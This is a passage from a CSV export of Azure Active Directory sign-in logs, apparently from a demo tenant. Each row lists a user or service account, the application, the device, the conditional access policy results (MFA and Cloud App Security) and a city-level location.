'5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",b58c6208-3745-40bc-8745-ecaa2c431500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,b58c6208-3745-40bc-8745-ecaa2c431500,SigninLogs,Sucess,36.6404686,-78.26995087
+960,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:21.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,137457c8-73d8-4f06-a503-0f0ef1c070b1,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",e073edf9-f5bb-4bea-bfc3-42662e701400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,e073edf9-f5bb-4bea-bfc3-42662e701400,SigninLogs,Sucess,33.7984581,-84.38828278
+961,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,26:05.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,483183dc-f85d-49c6-b2d4-eca88adb9df6,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:26,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",41cc5746-ae7e-445a-962a-17f6ac811400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,41cc5746-ae7e-445a-962a-17f6ac811400,SigninLogs,Sucess,41.90428925,-85.99833679
+962,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,25:52.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,98cc469f-40db-0000-54b3-3e2255a3e1d9,Microsoft.aadiam,Microsoft.aadiam,,9dadd76f-3237-4e1d-84e7-e45c59867492,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,[],notApplied,08/04/2020 16:25,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d774c493-40b1-4743-b785-3f4a0dc91300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",9dadd76f-3237-4e1d-84e7-e45c59867492,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,d774c493-40b1-4743-b785-3f4a0dc91300,SigninLogs,Failed,41.90428925,-85.99833679
+963,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:21.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,440299fe-b0d4-4bd8-9027-599f1ecefeef,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",e9cd98cc-4177-459a-870c-d2e45f851200,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,e9cd98cc-4177-459a-870c-d2e45f851200,SigninLogs,Sucess,50.6406517,5.572050095
+964,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:49.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,65bcc17b-9599-4989-b2d4-b2ff3db31eb2,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:22,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",41cc5746-ae7e-445a-962a-17f608661400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,41cc5746-ae7e-445a-962a-17f608661400,SigninLogs,Sucess,41.90428925,-85.99833679
+965,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:13.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,71cc469f-0076-0000-54b3-36e276f42244,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",3c1797ce-9a4e-4e19-b7f0-81e060d51300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,3c1797ce-9a4e-4e19-b7f0-81e060d51300,SigninLogs,Sucess,41.90428925,-85.99833679
+966,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:55.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,baf3d9dc-03ce-441b-bfbd-549af488f279,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",3c1797ce-9a4e-4e19-b7f0-81e01fdb1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3c1797ce-9a4e-4e19-b7f0-81e01fdb1300,SigninLogs,Sucess,33.7984581,-84.38828278
+967,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:20.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,48c4b914-ffa3-40ac-b607-8d4de9e072ee,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 17:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",dfcca72f-40c4-4044-85c7-4ddd1f001700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,dfcca72f-40c4-4044-85c7-4ddd1f001700,SigninLogs,Sucess,50.6406517,5.572050095
